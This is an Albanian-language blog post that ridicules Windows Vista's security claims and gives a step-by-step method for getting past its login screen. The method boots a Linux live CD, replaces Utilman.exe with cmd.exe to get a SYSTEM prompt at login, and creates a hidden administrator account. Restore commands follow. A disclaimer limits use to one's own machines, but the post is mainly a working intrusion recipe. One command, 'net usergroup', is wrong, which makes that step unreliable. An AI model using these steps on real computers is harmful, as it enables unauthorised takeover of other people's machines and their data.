Ne te njejten kohe, u bej thirrje te ndaloni duke kopiuar temat, duke i postuar neper forumet tuaja per fame ,a buje apo ku ta di une, dhe te kuptoni se ky web nuk eshte per qellime perfitimi, (shikoni gje ads) (po shes gje aplikacione te koduara nga une?) , dhe as per fame, pasi per ne dini vetem emrat dhe asgje tjeter.
SIç lexohet dhe tek rreth nesh qellimi i ketij webi eshte qe shqiptaret te kene nje pik referimi dhe te marrin e te japin njohuri, te permirsohen dhe te ecin perpara.
Ne postimin e ardhshem do te postoj nje video shume interesante mbi deklaraten e te drejtave te njeriut.
BTW APPLE SOCK

Windows Vista Security!

!!!Kujdes!!!
Materiali i meposhtem eshte vetem per qellime informative dhe une nuk mbaj asnjelloj pergjegjesie per ato qe mund te behen me informacionet e meposhtme. Gjithsecili qe i lexon duhet te pranoj kushtin qe nuk do ti perdor ato per qellime keqdashese apo ne kompiutera qe nuk jan nen pronesine tuaj. Ne te kundert ju nuk jeni te autorizuar qe te lexoni materialin e meposhtem!
Nuk lejohet leximi i materialit per personat qe jane nen 18 vjeç dhe personat shume emocional qe nuk kontrollojn vetveten dhe ato qe bejn.

Ose ne shqip, siguria e windows vista.

Pa e prishur shijen e temes po them se developersat e microsoft, si dhe deklaratat per shtyp te Steve Ballmer (nuk u keshilloj te shikoni videot e tij euforike ne youtube) na siguronin me kete sistem operativ nje revolucion te vertet, na garantonin nje papreshkmeri te privacy dhe te personalitetit te klientit dhe na garantonin sistemin operativ me te sigurt te ndertuar ndonjeher.
Nuk po egzagjeroj aspak me theniet .
Atehere si shpjegohet qe kan kaluar pak vite dhe po punojn per sistemin tjeter nderkohe qe eshte shume shpejt per te? (dhe behet fjale per 2 versione vianna dhe windows 7, sepse e pane qe me vista su doli gje keshtu qe njeri eshte testing dhe do te shitet dhe te behet nje eksperienc per tjeterin)
Ne realitet (realitet i hidhur ky) te gjitha keto deklarata nuk jane te verteta, dhe faktet e tregojn kete.

Penetrim (fizik) ne windows brenda 90 sekondave

Me posht do te paraqis nje menyre shume funksionale se si te penetrojm ne nje sistem windows vista, dhe te krijojm nje akont si administrator ne te me te drejta te plota nga nje sistem linux me suport ntfs-3g.
Po zgjedh nje distribucion Debian, po marrim Knoppix 5.5.3
Ç’lidhje ka ntfs-3g?
Nese jeni perdorues i linux , e dini shume mire se ne dual – boot ose me live cd\dvd ne kemi leje te hyjm tek particionet e windows te shohim dhe te kopjojm prej tyre, por jo te shkruajm\levizim file\eliminojm prej tyre (provojeni nese nuk u ka rene rasti) keshtu qe ky nuk eshte asgje tjeter perveç se nje driver i cili na jep ne mundesi per te pasur keto privilegje ne windows..
Dhe ntfs-3g eshte i instaluar by default ne Knoppix versionet 5.5.x
Mund ta instalojm edhe ne ç’faredo sistemi linux dhe ta perdorim.
Ne rregull klikojm tani qe kemi ber boot mbi particionin sda1 apo sda2 (kontrolloni se ku eshte windows/system32)
me te djathten dhe i japim Change Read write permissions dhe do te vihet ne pune draiveri ntfs-3g i cili do te na japi lejet per te modifikuar ne windows.
Shkojm tek Windows\System32 me terminal
Tani qe jemi aty japim

mv Utilman.exe Utilman.lol
cp cmd.exe  Utilman.exe

Ç’fare beme(perveç nje levizjeje te thjesht failesh)?
Kur sistemi windows ben boot dhe na del faqa e bukur e login qe kerkon password ne mund te perdorim butonin e windows dhe klikojm u per te pasur nje dritare prompt qe na ndihmon per loginin keshtu ne fjale te tjere kur sistemi te shkoj te therras Utilman.exe (qe ne realitet eshte cmd.exe pra prompti) nuk do te dali me dritarja e ndihmes por do te dali prompti dhe ne do te jemi system.
Bukur bejm boot dhe shohim faqen e login te windows vista, klikojm tek tasti me shenjen e windows dhe klikojm u dhe do te na dali prompti.
Mbas kesaj shtojm nje user me prompt me komanden

net user /add useriri passwordi

I japim ketij useri privilegje administratori

net usergroup administrators /add useriri

Per te rikthyer ashtu siç ishin ato qe bem , hym perseri me knoppix live dvd dhe japim perseri me te djathten mbi particion change read\write permissions dhe hapim terminalin shkojm tek Windows\System32 dhe japim keto komanda:

rm Utilman.exe
mv Utilman.lol Utilman.exe

Dhe ja ku penetruam ne sistemin “me te sigurt te krijuar ndonjehere” 😛 (dhe i kthyem gjerat ne “normalitet”)

(lol vertet me vjen per te qeshur kur e them )